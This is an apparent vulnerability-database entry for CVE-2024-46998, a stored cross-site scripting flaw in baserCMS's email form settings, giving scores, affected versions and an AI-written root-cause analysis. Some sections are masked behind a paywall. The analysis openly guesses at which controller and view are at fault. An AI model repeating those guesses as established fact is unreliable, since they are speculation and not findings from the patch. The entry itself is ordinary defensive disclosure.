Miggo Logo
Miggo Vulnerability Database
CVE-2024-46998

CVE-2024-46998:
baserCMS has a Cross-site Scripting (XSS) Vulnerability in Edit Email Form Settings Feature

7.1

CVSS Score
3.1

Basic Information

CVE ID
CVE-2024-46998
GHSA ID
GHSA-p3m2-mj3j-j49x
EPSS Score
0.28185%
CWE
CWE-79
Published
10/24/2024
Updated
10/28/2024
KEV Status
No
Technology
TechnologyPHP

Technical Details

CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N
Package NameEcosystemVulnerable VersionsFirst Patched Version
baserproject/basercmscomposer<= 5.1.15.1.2

Vulnerability Intelligence
Miggo AIMiggo AI

Miggo AIRoot Cause Analysis

The vulnerability involves stored XSS in the Edit Email Form Settings feature. XSS typically occurs when user input is not sanitized on output. In MVC frameworks like baserCMS (CakePHP-based), controllers handle input processing, and views handle rendering. The edit action in EmailFormSettingsController likely fails to sanitize input before saving, while the associated view template (edit.ctp) may lack proper escaping (e.g., using <?= h($field) ?>). The high confidence in the view template stems from the prevalence of XSS via unescaped output in similar CMS systems. The medium confidence in the controller reflects uncertainty about input validation practices without explicit patch details.

Vulnerable functions

Only Mi**o us*rs **n s** t*is s**tion

WAF Protection Rules

WAF Rule

XSS vuln*r**ility in **it *m*il *orm S*ttin*s ***tur* to **s*r*MS. ### T*r**t **s*r*MS *.*.* *n* **rli*r v*rsions ### Vuln*r**ility M*li*ious *o** m*y ** *x**ut** in **it *m*il *orm S*ttin*s ***tur*. ### *ount*rm**sur*s Up**t* to t** l*t*st v*rsio

Reasoning

T** vuln*r**ility involv*s stor** XSS in t** **it *m*il *orm S*ttin*s ***tur*. XSS typi**lly o**urs w**n us*r input is not s*nitiz** on output. In MV* *r*m*works lik* **s*r*MS (**k*P*P-**s**), *ontroll*rs **n*l* input pro**ssin*, *n* vi*ws **n*l* r*n